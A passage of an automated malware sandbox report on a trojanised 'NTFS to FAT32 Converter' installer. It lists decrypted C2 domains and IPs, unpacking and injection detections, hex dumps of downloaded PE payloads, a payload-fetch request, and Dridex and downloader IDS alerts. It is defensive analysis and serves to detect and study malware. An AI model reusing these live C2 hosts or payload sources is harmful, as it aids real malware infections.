                    Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: jawdedmirror.run/ewqd
                    Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: changeaie.top/geps
                    Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: lonfgshadow.live/xawi
                    Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: liftally.top/xasj
                    Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: nighetwhisper.top/lekd
                    Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: salaccgfa.top/gsooz
                    Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: zestmodp.top/zeda
                    Source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmpString decryptor: owlflright.digital/qopy
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0045D4EC GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,4_2_0045D4EC
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0045D5A0 ArcFourCrypt,4_2_0045D5A0
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_0045D5B8 ArcFourCrypt,4_2_0045D5B8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_10001000 ISCryptGetVersion,4_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_10001130 ArcFourCrypt,4_2_10001130

                    Phishing

                    barindex
                    Yara detected BlockedWebSite
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\5I0ZLKZO7SYLHSOPSEU02A6S8PA.exe, type: DROPPED

                    Compliance

                    barindex
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeUnpacked PE file: 0.2.nK8noQeiXl.exe.3430000.0.unpack
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeUnpacked PE file: 5.2.ntfs2fat32converter102.exe.400000.0.unpack
                    Source: nK8noQeiXl.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NTFS to FAT32 Converter_is1Jump to behavior
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49699 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49700 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49701 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49702 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49703 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 185.39.17.76:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.40.117:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.53.21:443 -> 192.168.2.5:49710 version: TLS 1.2
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_100081AE FindFirstFileExW,1_2_100081AE
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00452A4C FindFirstFileA,GetLastError,4_2_00452A4C
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004751F8 FindFirstFileA,FindNextFileA,FindClose,4_2_004751F8
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00464048 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,4_2_00464048
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004644C4 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,4_2_004644C4
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00462ABC FindFirstFileA,FindNextFileA,FindClose,4_2_00462ABC
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00497A74 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,4_2_00497A74

                    Networking

                    barindex
                    System process connects to network (likely due to code injection or exploit)
                    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 194.87.98.18 443Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 67.195.204.77 25Jump to behavior
                    Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 52.101.41.22 25Jump to behavior
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: proenhann.digital/thnb
                    Source: Malware configuration extractorURLs: jawdedmirror.run/ewqd
                    Source: Malware configuration extractorURLs: changeaie.top/geps
                    Source: Malware configuration extractorURLs: lonfgshadow.live/xawi
                    Source: Malware configuration extractorURLs: liftally.top/xasj
                    Source: Malware configuration extractorURLs: nighetwhisper.top/lekd
                    Source: Malware configuration extractorURLs: salaccgfa.top/gsooz
                    Source: Malware configuration extractorURLs: zestmodp.top/zeda
                    Source: Malware configuration extractorURLs: owlflright.digital/qopy
                    Source: Malware configuration extractorURLs: 185.39.17.76
                    Source: Malware configuration extractorURLs: quag.cn:443
                    Source: Malware configuration extractorURLs: jotunheim.name:443
                    Creates HTML files with .exe extension (expired dropper behavior)
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exeFile created: 5I0ZLKZO7SYLHSOPSEU02A6S8PA.exe.13.dr
                    Source: global trafficTCP traffic: 192.168.2.5:49722 -> 62.210.201.223:2024
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Apr 2025 15:02:38 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="UNIQTWO.file";Content-Length: 3719914Keep-Alive: timeout=5, max=97Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 94 00 00 00 46 00 00 00 00 00 00 40 9c 00 00 00 10 00 00 00 b0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 01 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 50 09 00 00 00 10 01 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 64 93 00 00 00 10 00 00 00 94 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 4c 02 00 00 00 b0 00 00 00 04 00 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 88 0e 00 00 00 c0 00 00 00 00 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 50 09 00 00 00 d0 00 00 00 0a 00 00 00 9c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 e0 00 00 00 00 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 00 00 00 02 00 00 00 a6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 b4 08 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 2c 00 00 00 10 01 00 00 2c 00 00 00 a8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 00 00 00 00 00 de 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Apr 2025 15:02:46 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="UNIQTHREE.file";Content-Length: 2558840Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 b4 46 f5 3a 00 00 00 00 00 00 00 00 e0 00 8f 81 0b 01 02 19 00 50 01 00 00 54 01 00 00 00 00 00 78 64 01 00 00 10 00 00 00 70 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 06 00 00 00 05 00 00 00 00 00 00 00 00 50 03 00 00 04 00 00 00 00 00 00 02 00 00 80 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 9e 0f 00 00 00 10 02 00 2c 33 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 e3 01 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f8 43 01 00 00 10 00 00 00 44 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 e8 0b 00 00 00 60 01 00 00 0c 00 00 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 9c 0d 00 00 00 70 01 00 00 0e 00 00 00 54 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 4c 57 00 00 00 80 01 00 00 00 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 9e 0f 00 00 00 e0 01 00 00 10 00 00 00 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 f0 01 00 00 00 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 00 02 00 00 02 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 2c 33 01 00 00 10 02 00 00 34 01 00 00 74 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 02 00 00 00 00 00 00 26 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 15 Apr 2025 15:02:55 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="UNIQ.file";Content-Length: 9061906Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f f0 68 44 3b 91 06 17 3b 91 06 17 3b 91 06 17 1c 57 6b 17 36 91 06 17 86 de 90 17 3a 91 06 17 32 e9 93 17 1c 91 06 17 32 e9 85 17 80 91 06 17 32 e9 82 17 f8 91 06 17 25 c3 82 17 32 91 06 17 1c 57 68 17 3a 91 06 17 1c 57 7d 17 14 91 06 17 3b 91 07 17 2e 92 06 17 32 e9 8c 17 56 90 06 17 25 c3 92 17 3a 91 06 17 32 e9 97 17 3a 91 06 17 52 69 63 68 3b 91 06 17 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 99 7b 95 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 2c 23 00 00 7e 12 00 00 00 00 00 63 b4 1c 00 00 10 00 00 00 40 23 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 80 3a 00 00 04 00 00 46 33 0b 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 49 2b 00 e0 01 00 00 00 70 2c 00 00 0c 0e 00 00 00 00 00 00 00 00 00 0a 15 8a 00 08 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 eb 26 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 23 00 ac 09 00 00 18 49 2b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6b 2a 23 00 00 10 00 00 00 2c 23 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 3d 08 00 00 40 23 00 00 3e 08 00 00 30 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 28 e5 00 00 00 80 2b 00 00 6a 00 00 00 6e 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 0c 0e 00 00 70 2c 00 00 0c 0e 00 00 d8 2b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: global trafficHTTP traffic detected: GET /PA.bin HTTP/1.1Connection: Keep-AliveHost: h1.passionwhenever.shop
                    Source: Joe Sandbox ViewIP Address: 185.156.73.98 185.156.73.98
                    Source: Joe Sandbox ViewIP Address: 67.195.204.77 67.195.204.77
                    Source: Joe Sandbox ViewASN Name: MTW-ASRU MTW-ASRU
                    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49699 -> 104.21.40.117:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49700 -> 104.21.40.117:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.40.117:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49703 -> 104.21.40.117:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49702 -> 104.21.40.117:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49707 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49706 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49705 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49710 -> 104.21.53.21:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49712 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.40.117:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49716 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49718 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49726 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49719 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49717 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49731 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49732 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49733 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49713 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49725 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49735 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49734 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49729 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49738 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49739 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49736 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49740 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49741 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49714 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49737 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49744 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49746 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49709 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49742 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49711 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49745 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49720 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49730 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49701 -> 104.21.40.117:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49715 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49721 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49714 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49720 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49736 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49725 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49705 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49733 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49740 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49713 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49716 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49731 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49744 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49730 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49709 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49732 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49737 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49719 -> 185.39.17.76:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49726 -> 185.39.17.76:443
